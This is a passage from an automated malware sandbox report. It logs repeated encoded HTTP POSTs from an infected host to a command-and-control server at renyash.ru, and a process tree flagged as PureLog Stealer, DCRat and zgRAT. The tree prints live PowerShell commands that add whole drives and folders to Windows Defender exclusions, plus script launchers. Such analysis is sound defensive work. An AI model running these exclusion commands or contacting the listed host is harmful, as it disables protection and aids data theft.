                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:32.674146891 CET | 2584 | OUT | Data Raw: 56 5b 5c 56 56 46 55 5b 5d 5f 52 56 5a 5f 58 54 57 50 5f 5b 54 54 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[\VVFU[]_RVZ_XTWP_[TTUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y)/=]!;4;,, >*+-#T7)=?9:76/(,%\ ![(
                                                                        Dec 28, 2024 20:44:33.489902020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:34.015142918 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IsvfHfZMAPQcKyo3f2g3VirRzBj%2FOmfCVo%2FLvQKqe60VxRq1vxx06LBrBDJGREd6CGqubIlCiVOClUN6vi8Kqs0JrBkcSsAXid%2BBnpIQ3Q5RlgYq96ff5GIkXZKkVDFz9gzAiHvd"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bb04a856a5e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4191&min_rtt=1766&rtt_var=5512&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=68972&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        66 | 192.168.2.4 | 49995 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:34.257792950 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:34.614145041 CET | 2584 | OUT | Data Raw: 56 50 59 54 56 45 55 59 5d 5f 52 56 5a 5f 58 58 57 5c 5f 5b 54 54 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYTVEUY]_RVZ_XXW\_[TTUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'+! ;4_#?/<7X-+-#9?V)?:_?]#0>%\ ![(
                                                                        Dec 28, 2024 20:44:35.435101986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:35.689105034 CET | 809 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4pY0KZl8%2B2SU7J3epBDiB3XKJihzFmiOEnlBs3QDskkVRQc%2BOyVXOjUpcSuecExlUo3DeVtoS1DVsb0kw1xwLH1b0Osjjwv1%2Bt6abN%2BvTygMe1pCie7MSpgucF0gyvzbZ2p%2Bl9I"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bbc7cc87ca8-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3527&min_rtt=1973&rtt_var=3848&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=101353&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        67 | 192.168.2.4 | 50000 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:35.933182955 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:36.282404900 CET | 2580 | OUT | Data Raw: 56 5a 5c 53 56 45 50 5c 5d 5f 52 56 5a 58 58 58 57 5e 5f 5e 54 54 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZ\SVEP\]_RVZXXXW^_^TTUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y?Z26]##,[,87#&Y*.,#9/V>Y0-)(!8)%\ ![(7
                                                                        Dec 28, 2024 20:44:36.610506058 CET | 1236 | OUT | Data Raw: 38 09 00 07 0b 39 10 50 32 29 0e 14 0b 05 20 14 39 3c 30 29 03 1b 31 5b 34 54 3a 25 31 5f 33 2c 3a 33 18 2c 39 21 1b 1f 35 39 18 06 33 54 47 20 3b 3b 3e 27 3b 28 19 1d 3a 02 18 26 28 31 47 17 38 06 1d 0e 2e 01 06 5e 30 5f 50 2a 05 24 10 2c 35 0f
                                                                        Data Ascii: 89P2) 9<0)1[4T:%1_3,:3,9!593TG ;;>';(:&(1G8.^0_P*$,5>4>$;=8\0=2(_:<]/+.=9<0)!;;(]8 4'=7?#-401;\ 3Y 5_419**YX2\8:".(<(X1:A>83*7(7A9_98QS/%1U31 7;9P,)5'<,10:>,]$2?&
                                                                        Dec 28, 2024 20:44:37.019840956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:37.258095026 CET | 807 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SwOWbygqSurDLnChlwV1h6K0Z9asJJe0TKdoJPdIY3%2BZqjrhGoYJ%2B0Lpv48fZ8R%2BU8g9nEJpMl8HhfW0q50n5W%2BfcsWQ2hGx4XcMAJSQdoUNXYj6DMd9wg2f3J3wLUc0Vf2ZqRka"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bc66ffdc40e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6964&min_rtt=1518&rtt_var=11461&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=32381&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        68 | 192.168.2.4 | 50004 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:37.500195026 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:37.845014095 CET | 2584 | OUT | Data Raw: 53 51 5c 54 56 47 50 58 5d 5f 52 56 5a 5b 58 5e 57 5a 5f 5b 54 53 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SQ\TVGPX]_RVZ[X^WZ_[TSUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y+/> ;8[464;;/7*_>-#4:,)3_.#"03_),%\ ![(+
                                                                        Dec 28, 2024 20:44:38.592981100 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:38.826888084 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKlqiQ3PIpg0bLyIniZ9Q2WkAhFeDbIjyTJPuPWEDcWuEtkmzS6l15j%2Fos7exYaS397qmzdveNw1OYmMN1URmhwLJtYxlAtTDTVcp3ZWm6HpA1zYM3C9FcCySW2G5BSU%2FE9LFg%2BO"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bd04a70422d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3764&min_rtt=1603&rtt_var=4923&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=77277&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        69 | 192.168.2.4 | 50007 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:39.094348907 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:39.438631058 CET | 2580 | OUT | Data Raw: 53 52 5c 53 56 49 50 59 5d 5f 52 56 5a 58 58 5a 57 5e 5f 5b 54 57 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SR\SVIPY]_RVZXXZW^_[TWUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_?&! X45/;Y >1*0 :+U(,?9;X!;^><%\ ![(?
                                                                        Dec 28, 2024 20:44:40.271938086 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:40.525149107 CET | 808 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PN1sehaRhHZl%2ByCw6BZ4BelgW0csxEdYEWj6OjMh5AaocF1Kw6hWL36VAC40KJ6Ywv%2Fv0ppvmKoEZVPLHuCr%2FZljtphyTpetWjoRERmpCK0DRyP1fOWtPW%2FjbcyhdD5Zgb8AmF%2B8"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bdabcae8c09-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4354&min_rtt=1921&rtt_var=5587&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=68265&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        70 | 192.168.2.4 | 50013 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:40.757334948 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:41.110549927 CET | 2584 | OUT | Data Raw: 53 56 59 57 56 48 50 5f 5d 5f 52 56 5a 50 58 55 57 5b 5f 50 54 53 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SVYWVHP_]_RVZPXUW[_PTSUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'?Z!6; _"%7,+'#"]=?V7) =,3. !0*,%\ ![(
                                                                        Dec 28, 2024 20:44:41.887303114 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:42.133778095 CET | 814 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RyoNZPlOSbzUBPKOOjdQfutVaw5f4qGHLODwc6s7ieE%2BqiZ3R5jZ6QIbvD%2BfAeiYqlGYDJavAB%2FF3JMy%2BXSedrgXN713SKUiSg%2FAmZthrliAS5LS9AXs%2FohlXX%2Byrn0j%2B4DvDRm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940be4ccf9f5f4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3349&min_rtt=1669&rtt_var=3987&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=96586&cwnd=102&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        71 | 192.168.2.4 | 50019 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:42.371784925 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:43.503674984 CET | 25 | IN | HTTP/1.1 100 Continue



                                                                        Target ID:0
                                                                        Start time:14:42:01
                                                                        Start date:28/12/2024
                                                                        Path:C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\ZZ2sTsJFrt.exe"
                                                                        Imagebase:0xf00000
                                                                        File size:2'330'001 bytes
                                                                        MD5 hash:403138422D8DA9FDD31FE147959A1403
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1677180578.0000000005330000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1676672997.00000000069F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:14:42:01
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe"
                                                                        Imagebase:0x2c0000
                                                                        File size:147'456 bytes
                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:14:42:02
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "
                                                                        Imagebase:0x240000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:14:42:02
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:14:42:02
                                                                        Start date:28/12/2024
                                                                        Path:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"
                                                                        Imagebase:0x4f0000
                                                                        File size:2'008'064 bytes
                                                                        MD5 hash:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1686573197.00000000004F2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 83%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:8
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                        Imagebase:0x800000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:10
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:12
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:14
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:15
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
